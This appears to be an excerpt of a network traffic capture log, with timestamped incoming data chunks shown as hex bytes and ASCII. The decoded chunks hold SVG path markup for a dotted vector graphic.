                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6053INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                  Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6069INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6085INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6101INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6117INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                  Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6133INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                  Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6149INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                  Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6165INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6181INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                  Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6197INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6213INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                  Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6229INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                  Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6245INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                  Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6261INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                  Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6277INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6293INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6309INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                  Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
